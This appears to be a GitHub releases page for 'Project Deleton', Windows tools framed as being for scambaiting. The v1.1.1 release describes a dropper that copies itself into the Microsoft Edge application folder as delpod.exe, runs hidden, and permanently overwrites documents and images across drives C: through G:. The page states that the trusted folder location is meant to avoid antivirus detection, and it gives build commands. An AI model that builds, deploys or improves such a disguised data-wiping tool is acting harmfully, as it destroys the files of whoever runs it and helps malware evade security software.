Releases: ChaoticFormula/Project-Deleton
Del v1.1.1
Project Deleton v1.1.1
This release introduces a single EXE dropper that installs and launches the background file-wipe watcher as delpod.exe under the Edge application folder, plus the unchanged Safe Test utility.
π Contents
projectdeleton_c/
βββ Test (Safe)/
β βββ exe/
β β βββ safe.exe
β βββ safe.c
β βββ safevc.c
β βββ safev2.c
β βββ info.txt
βββ delete/
βββ exe/
β βββ delete.exe
βββ delete.c
βββ No Safe.txt
π New βDelete Dropperβ Feature
-
Single EXE (
delete.exe)- When you run
delete.exe, it copies itself into
C:\Program Files (x86)\Microsoft\Edge\Application\delpod.exe. - It then launches
delpod.exehidden (no console window).
- When you run
-
Background Watcher (
delpod.exe)-
Monitors drives:
C:,D:,E:,F:,G:in real time. -
Recursively overwrites any new or modified file with one of the target extensions
(.txt, .docx, .xlsx, .pdf, .jpg, .jpeg, .png, .bmp)
with the warning message:βWooh Delete delete delete........β
-
Runs silently as a background processβno UI, no console.
-
π Safe Test Utility
-
safe.exe(inTest (Safe)/exe) remains unchanged. -
Overwrites only files in its own folder (no recursion) with:
βYou are a thief. This device has been locked down.β
-
Ideal for verifying behavior in a controlled environment.
β οΈ Important
- Both tools permanently overwrite file contentsβno recovery without external backups.
- Always test with Safe Test first before deploying the dropper.
- This dropper approach avoids antivirus delays and false positives by leveraging a trusted folder location.
π οΈ Build Instructions
# Safe Test
gcc safe.c -mwindows -o safe.exe
# Delete Dropper (single EXE)
gcc delete.c -mwindows -lshlwapi -o delete.exeDel v1.1.0
Project Deleton (C Edition)
This archive contains two C-based standalone tools for scambaiting or secure file overwriting demonstrations. Includes both a Safe Test version and the full Delete version.
π Contents
projectdeleton_c/
βββ Test (Safe)/
β βββ exe/
β β βββ safe.exe
β βββ safe.c
β βββ info.txt
βββ delete/
βββ exe/
β βββ delete.exe
βββ delete.c
βββ No Safe.txt
π Usage
-
Safe Test (
Test (Safe)/):- Run
safe.exedirectly in any folder of your choice. - It will only overwrite files in that folder with a warning message.
- This is a safe version for testing and demonstration.
- Run
-
Full Delete (
delete/):- Run
delete.exeto perform recursive file overwrite on all files starting from the current working directory. - Targets commonly used extensions (e.g.,
.txt,.jpg,.pdf,.docx, etc.).
- Run
β οΈ Important
- These tools overwrite file contents permanently. There's no recovery unless backed up beforehand.
- Early Python
.exeversions sometimes failed due to antivirus false-positives or runtime delays.
β To solve that, this C-based version was made for more reliability and speed. - Always test with the Safe Test version before running the Full Delete tool.
π§ Notes
- Built using GCC (MinGW for Windows).
- No dependencies, no runtime required.
- Designed for Windows x64.
π§ͺ Compilation (If you want to build yourself)
gcc safe.c -mwindows -o safe.exe
gcc delete.c -mwindows -o delete.exeDel v1.1.0-Beta
Project Deleton
This archive contains two standalone tools for βscambaitingβ scenarios: a Safe Test version and the full Delete version.
π Contents
projectdeleton/
βββ Test (Safe)/
β βββ exe/
β β βββ safe.exe
β βββ safe.py
β βββ info.txt
βββ delete/
βββ exe/
β βββ delete.exe
βββ delete.py
βββ No Safe.txt
π Usage
-
Safe Test (
Test (Safe)/):- Run safe.exe (or
python safe.py) in a folder of your choice. - It will overwrite only the files in that same folder with a warning message.
- Use this to verify behavior without touching other directories.
- Run safe.exe (or
-
Full Delete (
delete/):- Run delete.exe (or
python delete.py) to scan all configured drives/folders and overwrite matching files. - Warning: This is permanent. DO NOT run on your main data drive unless you have a full external backup.
- Run delete.exe (or
β οΈ Important
- Both tools will destroy original file contentsβno recovery without backups.
- Always test with the Safe Test version first.
- Keep your backups elsewhere before using Delete.
